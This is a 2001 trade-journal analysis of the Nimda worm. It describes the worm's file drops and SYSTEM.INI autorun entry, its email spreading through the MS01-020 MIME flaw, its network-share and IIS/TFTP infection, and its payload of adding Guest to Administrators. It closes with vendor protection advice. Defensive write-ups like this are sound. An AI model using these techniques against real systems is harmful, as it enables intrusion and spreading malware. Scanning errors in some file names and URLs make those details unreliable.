Nimda - how it works. (VIRUS NOTES).
In order to run from an infected message, the worm exploits a security breach. The worm then installs itself to the system, and runs a spreading routine and payload. The worm contains the following "copyright" text string: Concept Virus(CV) V-5, Copyright(C)2001 R.P.China
While installing, the worm copies itself - to the Windows directory with the MMC.EXE name - to the Windows system directory with RICHED2O.DLL (and overwrites original Windows RICHED2O.OLL file) and with the LOAD.EXE name.
The last one is then registered in the auto-run section in a SYSTEM.INI file. [boot] shell=explorer, exe load.exe -dontrunold The worm also copies itself to a Temporary directory with random MEP*.TMP and MA*.TMP.EXE names, for example: mepOIA2.TMP mep1AO.TMP.exe mepEO02.TMP.exe mepEO03.TMP.exe nepEO04.TMP EXE files have Hidden and System attributes, as well as a LOAD.EXE file (see above).
The worm then runs its spreading and payload routines. Depending on the Windows version, the worm affects the EXLORER.EXE process, and may run its routines as an EXPLORER' background process (thread).
Spreading via E-mail
In order to send infected messages, the worm connects to a host machine by using SMTP protocol, and sends its copies to victim addresses.
In order to obtain victim e-mail addresses, the worm uses two ways:
1. scans *.HTM and *.HTML files and looks for e-mail-like strings
2. by using MAP[ connects to MS Exchange e-mail boxes and obtains e-mail addresses from there.
The infected messages are of HTML format and contain: Subject: empty or random Body. empty Attach: RFADME.EXE
Subjects are chosen from the name of a randomly selected file from a folder: HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\Shell Folders\Personal usually this is `My Documents" or a randomly selected file on the C: drive. In order to spread from infected messages, the worm uses an "IFRAME" trick; the vulnerability described at: Microsoft Security Bulletin (MS01-020): Incorrect MIME Header Can Cause IE to Execute E-mail Attachment http://www.microsoft.com/ technet/security/bulletin/MS01-020.asp Download patch: http://www.microsoft.com/windows/ie/downloads/critical/ q290108/default.asp
What causes the vulnerability?
If an HTML mail contains an executable attachment, whose MIME type is incorrectly given as one of several unusual types, a flaw in IE will cause the attachment to be executed without displaying a warning dialogue.
What does the patch do?
The patch eliminates the vulnerability by correcting the table of MIME types and their associated actions in IE. This has the effect of preventing e-mails from being able to automatically launch executable attachments.
Spreading via the local network The worm scans local and shared (mapped) remote drives in three different manners, and infects all accessible directories in there.
While infecting, the worm uses two different ways:
1. It creates .EML (in 95%) or .NWS (in 5%) files with randomly selected names. As a result, these EML and NWS files are everywhere on an infected machine (and in the local network), and there may be thousands of them. These files contain the worms copy in e-mail form. The e-mail form is an HTML e-mail message with the worm's copy in an MIME envelope, and with a IFRAME trick as described above. Upon being opened, this message immediately infects a vulnerable machine.
2. The worm looks for filgname+extension combinations *DEFAULT* *INDEX* *MAIN* *README* + .HTML, .HTM, .ASP
Spreading as an IIS attack
To upload its file to a victim's machine, the worm uses a `tftp" command, and activates a temporary TFTP server on an infected (current) machine to process the `get data" command from the victim's (remote) machine in exactly the same way as the ("BlueCode:IISWorm-BlueCode) IIS worm.
The name of file that is uploaded to a victim's machine is ADMIN.DLL. Payloads The payload routine adds "Guest" user to the Administrator User Group (as a result, a "Guest" user has full access to an infected machine). The worm also opens all local drives for sharing. www.kaspersky.com, Nimda Protection Sources Sophos Sophos has issued protection against the Nimda virus, which can be found at: http//.sophos.com/virusinfo/analyses/w32nimdaa.html GFI
Mail essentials for Exchange/SMTP is an email content checking and anti-virus solution that removes all types of email-borne threats before they can affect an organisers email users. Spare, viruses, dangerous attachments and offensive content can be removed before the email users can receive them. More information can be found at http://www.gfi.com/mesindex.htm Kaspersky
The latest Kaspersky anti-virus update urges the immediate installation of the Interact explorer and IIS patches that block the breaches. These patches not only repel "Nimda" attacks, but those of similar worms that could appear in the future.
|Printer friendly Cite/link Email Feedback|
|Publication:||Database and Network Journal|
|Date:||Oct 1, 2001|
|Previous Article:||Security: your PDA could land your boss in court.|
|Next Article:||"Blue code": worm that fights "Code Red" and IIS-servers. (VIRUS NOTES).|